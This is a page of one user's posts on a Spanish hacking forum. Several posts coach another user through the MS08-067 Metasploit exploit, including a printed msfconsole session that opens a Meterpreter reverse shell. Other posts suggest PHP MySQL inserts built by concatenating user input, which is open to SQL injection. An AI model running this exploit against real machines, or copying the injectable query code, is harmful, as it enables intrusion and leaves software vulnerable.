Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#3601
Bases de Datos / Re: Insert Mysql [PHP]
7 Enero 2010, 20:58 PM
Cita de: Ari-Slash en  7 Enero 2010, 20:54 PMperdon no me lo vas a creer pero me funciono  :xD
:silbar:

Cita de: Ari-Slash en  7 Enero 2010, 20:54 PMfaltaba tan solo 1 parentesis jajajaj  :-X
Seee Error comun... xD

Cita de: Ari-Slash en  7 Enero 2010, 20:54 PMgracias por tu ayuda me alegraste el dia   ;D  ;D
jajaja no hay de qué...

Saludos!
#3602
Scripting / Re: Problema con .bat
7 Enero 2010, 20:56 PM
Cita de: אครรเz en  7 Enero 2010, 20:52 PM
pero que pone la pantalla?
No es una pantalla es un MsgBox o Msg * en Batch. Supongo que dice, "Actualizacion Completa".

Pues de Batch nose mucho, averigua si se puede mandar una Tecla {Enter} ó {Intro}. vease SendKeys.

Saludos!!!
#3603
Bases de Datos / Re: Insert Mysql [PHP]
7 Enero 2010, 20:52 PM
Cita de: Ari-Slash en  7 Enero 2010, 20:48 PMes que copie y pege mal

$consulta = mysql_query('INSERT INTO mensajes (id,numero,autor,cuerpo) VALUES ('.$tema.','.$totalm.',"'.$autor.'","'.$mensaje.'"');

o sea en la consola mysql la uso asi
Código (sql) [Seleccionar]
INSERT INTO mensajes (id,numero,autor,cuerpo) VALUES (1,3,"Ari-Slash","Hola");

Intenta Así:

Código (php) [Seleccionar]
$consulta = mysql_query('INSERT INTO mensajes (id,numero,autor,cuerpo) VALUES ('.$tema.','.$totalm.','.$autor.','.$mensaje.')');

PD1: No olvides cerrar los ( )
PD2: Id = Tema? Pwned!

Saludos!
#3604
Hacking / Re: Ayuda Nmap y Metasploit
7 Enero 2010, 20:49 PM
Cita de: cpu2 en  7 Enero 2010, 20:44 PMComo es posible si NMAP me dice que es vulnerable a eso -.-

A ver Nmap te lanzo el puerto 6551/tcp bittorrent-tracker, No?
Ok, dentro de los parametros de ejecucion del Exploit windows/smb/ms08_067_netapi, necesitas que esta abierto el puerto 445. Alguna duda, es simple... xD

Cita de: cpu2 en  7 Enero 2010, 20:44 PMShell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.
No te rindas... ;) . Nada es Imposible...

Saludos!
#3605
Bases de Datos / Re: Insert Mysql [PHP]
7 Enero 2010, 20:44 PM
Cita de: Ari-Slash en  7 Enero 2010, 20:42 PMbueno esta consulta
$consulta = mysql_query('INSERT INTO mensajes (id,numero,autor,cuerpo)
si la pruebo en la consola de mysql anda bien, o sea funciona,

1. Donde estan los Parametros
2. Verifica el inicio y finalizacion de las comillas simples

Ejemplo: Creo que es así... :·P hace rato que no uso PHP
Código (php) [Seleccionar]
$consulta = mysql_query('INSERT INTO mensajes (id,numero,autor,cuerpo) VALUES ('.$id.', '.$Numero.', '.$Autor.', '.$Cuerpo.')')

Saludos!
#3606
Hacking / Re: Ayuda Nmap y Metasploit
7 Enero 2010, 20:42 PM
Cita de: rockernault en  7 Enero 2010, 20:16 PMmira bien las ip..

No tiene nada que ver, mira.

Citar

               |                    |      _) |  
__ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
|   |   |  __/ |   (   |\__ \ |   | | (   | | |  
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                             _|                  



      =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
      =[ svn r7808 updated 28 days hago (2009.12.10)


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on port 4444
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Spanish
  • Selected Target: Windows XP SP2 Spanish (NX)
  • Triggering the vulnerability...
  • Sending stage (723456 bytes)
    • Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:9121)[/b]

      meterpreter >
Saludos!
#3607
Hacking / Re: Ayuda Nmap y Metasploit
7 Enero 2010, 20:07 PM
1. Ingresando RHOST y LHOST iguales, WTF!
   No tiene problema, pero jajaja es raro, prefiero crearme tan siquiera una Maquina Virtual. :·P
2. Importante: La maquina a la que deseas ingresar con el exploit, no es vulnerable a ese exploit... xD

Cita de: Shell Root en  7 Enero 2010, 19:25 PM2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
Cita de: cpu2 en  3 Enero 2010, 18:19 PMPORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose...

Saludos!

Saludos!
#3608
Hacking / Re: Ayuda Nmap y Metasploit
7 Enero 2010, 19:25 PM
cpu2, a ver,

1. RHOST= Host_Remoto; LHOST= Host_Local
   RPORT= Puerto_Remoto; LPORT= Puerto_Local

2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
Cita de: cpu2 en  3 Enero 2010, 18:19 PMPORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose...

Saludos!
#3609
Quieres hacer un PING a la Web que vas a entrar, para verificar si hay conexion a internet o para ver si la web esta OnLine

http://www.elguille.info/colabora/puntonET/ar_PingVBNET.htm
ó
Código (vbnet) [Seleccionar]
    Imports System.Net

    Public Function funConexion() As Boolean
        Dim Req As HttpWebRequest = WebRequest.Create("http://foro.elhacker.net")
        Dim res As System.Net.HttpWebResponse

        Try
            Req = DirectCast(System.Net.WebRequest.Create("http://foro.elhacker.net"), System.Net.HttpWebRequest)


            res = DirectCast(Req.GetResponse(), System.Net.HttpWebResponse)

            Req.Abort()

            If res.StatusCode = System.Net.HttpStatusCode.OK Then
                Return True
            Else
                Return False
            End If
        Catch
            Return False
        End Try
    End Function


Saludos!
#3610
Hacking / Re: Ayuda Nmap y Metasploit
7 Enero 2010, 18:39 PM
Pwned, como bien lo dijistes

Cita de: cpu2 en  3 Enero 2010, 18:19 PMPORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445

Verificalo en el RPORT